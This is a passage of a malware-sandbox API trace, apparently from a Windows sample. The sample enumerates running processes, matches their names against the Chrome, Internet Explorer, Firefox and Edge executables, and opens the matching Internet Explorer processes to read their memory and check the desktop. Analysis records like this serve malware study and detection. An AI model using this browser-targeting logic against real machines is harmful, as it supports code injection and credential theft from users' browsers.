	[0234.933] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0234.933] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.933] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.934] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0234.934] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0234.934] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0234.935] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x74c4
	[0234.935] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.935] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0234.936] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.936] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.947] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.948] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0234.949] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.949] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.949] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0234.950] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x74c8
	[0234.950] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.951] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0234.951] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.951] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.951] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.951] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0234.952] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.953] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.953] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0234.954] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x74cc
	[0234.954] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.954] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0234.955] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.955] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.955] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.955] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0234.956] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.956] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.956] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0234.957] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x74d0
	[0234.958] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.958] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0234.958] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.958] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.959] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.959] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0234.959] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.959] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.960] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0234.961] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x74d4
	[0234.961] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.961] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0234.962] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.962] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.962] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.962] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0234.963] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.963] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.963] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0234.964] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x74d8
	[0234.964] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.964] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0234.965] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.965] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.965] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.965] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0234.965] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.965] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.965] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0234.966] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x74dc
	[0234.966] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.966] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0234.967] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.967] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.967] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.967] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0234.968] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.968] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.968] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0234.969] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x74e0
	[0234.969] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.969] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0234.969] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.970] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.970] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.970] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0234.970] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.971] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.971] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0234.972] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x74e4
	[0234.972] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.972] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0234.973] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.973] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.973] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.973] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0234.973] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.973] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.974] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0234.975] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x74e8
	[0234.975] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.975] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0234.975] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.975] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.976] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.976] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0234.976] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.976] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.976] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0234.977] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x74ec
	[0234.977] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.977] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0234.978] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.978] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.978] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.978] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0234.979] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.979] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.979] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0234.980] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x74f0
	[0234.980] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.980] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0234.980] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.981] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.981] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.981] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0234.982] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.982] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.982] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0234.983] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x74f4
	[0234.983] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.983] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0234.986] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.986] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.987] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.987] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0234.987] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.987] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.987] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0234.988] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x74f8
	[0234.988] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.988] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0234.989] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.989] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.990] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.990] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0234.990] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.990] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.991] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0234.992] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x74fc
	[0234.992] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.992] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0234.992] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.992] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.993] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.993] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0234.993] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.993] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.994] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0234.994] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x7500
	[0234.994] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.994] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0234.995] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.995] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0234.995] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.995] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0234.995] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.995] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.996] NtQueryInformationProcess (in: ProcessHandle=0x7500, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0234.996] ReadProcessMemory (in: hProcess=0x7500, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0234.996] ReadProcessMemory (in: hProcess=0x7500, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0234.996] ReadProcessMemory (in: hProcess=0x7500, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0234.996] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0234.996] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0234.997] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x7504
	[0234.997] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.997] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0234.997] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.997] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0234.998] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.998] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0234.998] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.998] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.998] NtQueryInformationProcess (in: ProcessHandle=0x7504, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0234.998] ReadProcessMemory (in: hProcess=0x7504, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0234.998] ReadProcessMemory (in: hProcess=0x7504, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0234.998] ReadProcessMemory (in: hProcess=0x7504, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0234.998] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0234.999] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0235.000] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x7508
	[0235.000] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.000] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0235.000] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.000] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0235.000] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.000] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0235.001] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.001] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0235.001] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0235.002] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x750c
	[0235.002] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.002] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0235.002] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.002] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0235.003] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.003] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0235.003] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.003] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0235.003] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0235.011] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x7510
	[0235.011] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.011] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0235.011] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.011] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0235.012] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.012] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0235.012] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.012] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0235.012] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0235.013] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0235.014] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x7514
	[0235.014] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.014] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0235.014] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.014] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0235.015] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.015] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0235.015] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.015] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0235.015] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0235.016] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa70) returned 0x7518
	[0235.016] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.016] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0235.017] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.017] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0235.017] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
